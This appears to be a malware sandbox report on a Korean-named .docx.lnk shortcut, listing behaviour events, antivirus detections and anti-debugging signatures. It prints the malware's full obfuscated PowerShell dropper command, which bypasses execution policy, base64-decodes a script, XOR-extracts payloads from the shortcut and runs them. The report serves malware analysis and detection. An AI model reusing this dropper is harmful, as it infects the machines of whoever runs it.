NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fc5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f55000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fbc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f56000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fcc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05031000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05035000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05036000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05037000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05038000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05039000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 6:13 p.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05044000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\근로신청서 관련의 건.docx.lnk
file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\windows\system32\cmd.exe" /c set s=posuiheihcksuehhfhell & call %s:suiheihcksuehhf=wers% -ep bypass -c $cbaeiufhixdjf='cboauyusgeifu7ih983fef'; $ol=0x00001054;$tl=0x0000448a;$mviubse='UsICRpKzYpOyRmaT0xMDsgICAgICAgICBmb3IoW2ludF0kcD0kaSskZmk7ICRwIC1sdCAoJGkgKyAkZmkgKyRkd1BhdGhMZW4gKyAkZHdEYXRhTGVuKTsgJHArKyl7ICRmaWxlWyRwXSA9ICRmaWxlWyRwXSAtYnhvciAkYlhvcn07W2J5dGVbXV0kcGF0aEhleCA9ICRmaWxlWygkaSskZmkpLi4oJGkrJGZpKyRkd1BhdGhMZW4tMSldOyRwYXRoID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKCRmaWxlWygkaSskZmkpLi4oJGkrJGZpKyRkd1BhdGhMZW4tMildKTsgc2MgJHBhdGggKFtieXRlW11dKCRmaWxlIHwgc2VsZWN0IC1Ta2lwICgkaSskZmkrJGR3UGF0aExlbikgfCBzZWxlY3QgLVNraXBMYXN0ICgkZmlsZVNpemUtJGktJGZpLSRkd1BhdGhMZW4tJGR3RGF0YUxlbikpKSAtRW5jb2RpbmcgQnl0ZTtpZigkYlJ1bil7JiRwYXRoO30kaT0kaSskZmkrJGR3UGF0aExlbiskZHdEYXRhTGVuO30='; $isncuhef='7ujh3e8uyhgsoikjdfsefsef'; $a='JGxua3BhdGggPSBHZXQtQ2hpbGRJdGVtICoubG5rIHwgd2hlcmUtb2JqZWN0IHskXy5sZW5ndGggLWVxICR0bH0gfCBTZWxlY3QtT2JqZWN0IC1FeHBhbmRQcm9wZXJ0eSBOYW1lOyBpZigkbG5rcGF0aC5jb3VudCAtZXEgMCl7JGxua3BhdGggPSBHZXQtQ2hpbGRJdGVtICRlbnY6VEVNUFwqXCoubG5rIHwgd2hlcmUtb2JqZWN0IHskXy5sZW5ndGggLWVxICR0bH07fTskZmlsZSA9IGdjICRsbmtwYXRoIC1FbmNvZGluZyBCeXRlOyAkZmlsZVNpemUgPSAkZmlsZS5jb3VudDskaT0kb2w7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2hpbGUoJGkgLWx0ICRmaWxlU2l6ZSl7JGJYb3I9JGZpbGVbJGldOyRiUnVuPSRmaWxlWyRpKzFdOyRkd1BhdGhMZW49W2JpdGNvbnZlcnRlcl06OlRvSW50MzIoJGZpbGUsICRpKzIpOyRkd0RhdGFMZW49W2JpdGNvbnZlcnRlcl06OlRvSW50MzIoJGZpbG';$euhksjbdibiwybfkjsnsfefcv = [Convert]::FromBase64String($a+$mviubse);$isuhef = -join ($euhksjbdibiwybfkjsnsfefcv -as [char[]]); .('{0}{3}{1}{4}{2}'-f 'Inv','ke-Expre','n','o','ssio') $isuhef;

cmdline

powershell -ep bypass -c $cbaeiufhixdjf='cboauyusgeifu7ih983fef'; $ol=0x00001054;$tl=0x0000448a;$mviubse='UsICRpKzYpOyRmaT0xMDsgICAgICAgICBmb3IoW2ludF0kcD0kaSskZmk7ICRwIC1sdCAoJGkgKyAkZmkgKyRkd1BhdGhMZW4gKyAkZHdEYXRhTGVuKTsgJHArKyl7ICRmaWxlWyRwXSA9ICRmaWxlWyRwXSAtYnhvciAkYlhvcn07W2J5dGVbXV0kcGF0aEhleCA9ICRmaWxlWygkaSskZmkpLi4oJGkrJGZpKyRkd1BhdGhMZW4tMSldOyRwYXRoID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKCRmaWxlWygkaSskZmkpLi4oJGkrJGZpKyRkd1BhdGhMZW4tMildKTsgc2MgJHBhdGggKFtieXRlW11dKCRmaWxlIHwgc2VsZWN0IC1Ta2lwICgkaSskZmkrJGR3UGF0aExlbikgfCBzZWxlY3QgLVNraXBMYXN0ICgkZmlsZVNpemUtJGktJGZpLSRkd1BhdGhMZW4tJGR3RGF0YUxlbikpKSAtRW5jb2RpbmcgQnl0ZTtpZigkYlJ1bil7JiRwYXRoO30kaT0kaSskZmkrJGR3UGF0aExlbiskZHdEYXRhTGVuO30='; $isncuhef='7ujh3e8uyhgsoikjdfsefsef'; $a='JGxua3BhdGggPSBHZXQtQ2hpbGRJdGVtICoubG5rIHwgd2hlcmUtb2JqZWN0IHskXy5sZW5ndGggLWVxICR0bH0gfCBTZWxlY3QtT2JqZWN0IC1FeHBhbmRQcm9wZXJ0eSBOYW1lOyBpZigkbG5rcGF0aC5jb3VudCAtZXEgMCl7JGxua3BhdGggPSBHZXQtQ2hpbGRJdGVtICRlbnY6VEVNUFwqXCoubG5rIHwgd2hlcmUtb2JqZWN0IHskXy5sZW5ndGggLWVxICR0bH07fTskZmlsZSA9IGdjICRsbmtwYXRoIC1FbmNvZGluZyBCeXRlOyAkZmlsZVNpemUgPSAkZmlsZS5jb3VudDskaT0kb2w7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2hpbGUoJGkgLWx0ICRmaWxlU2l6ZSl7JGJYb3I9JGZpbGVbJGldOyRiUnVuPSRmaWxlWyRpKzFdOyRkd1BhdGhMZW49W2JpdGNvbnZlcnRlcl06OlRvSW50MzIoJGZpbGUsICRpKzIpOyRkd0RhdGFMZW49W2JpdGNvbnZlcnRlcl06OlRvSW50MzIoJGZpbG';$euhksjbdibiwybfkjsnsfefcv = [Convert]::FromBase64String($a+$mviubse);$isuhef = -join ($euhksjbdibiwybfkjsnsfefcv -as [char[]]); .('{0}{3}{1}{4}{2}'-f 'Inv','ke-Expre','n','o','ssio') $isuhef;

File has been identified by 8 AntiVirus engines on VirusTotal as malicious (8 events)

Symantec	CL.Downloader!gen204
Avast	LNK:Agent-EW [Trj]
Kaspersky	HEUR:Trojan.WinLNK.Agent.gen
Kingsoft	Script.Troj.CMDLnk.22143
ZoneAlarm	HEUR:Trojan.WinLNK.Agent.gen
VBA32	Trojan.Link.ShellCmd
SentinelOne	Static AI - Suspicious LNK
AVG	LNK:Agent-EW [Trj]

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 9, 2024, 6:13 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2640 resumed a thread in remote process 2756
NtResumeThread July 9, 2024, 6:13 p.m.	thread_handle: 0x00000338 suspend_count: 1 process_identifier: 2756	1	0	0

Creates a suspicious Powershell process (1 event)

option

-ep bypass

value

Attempts to bypass execution policy

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

근로신청서 관련의 건.docx.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All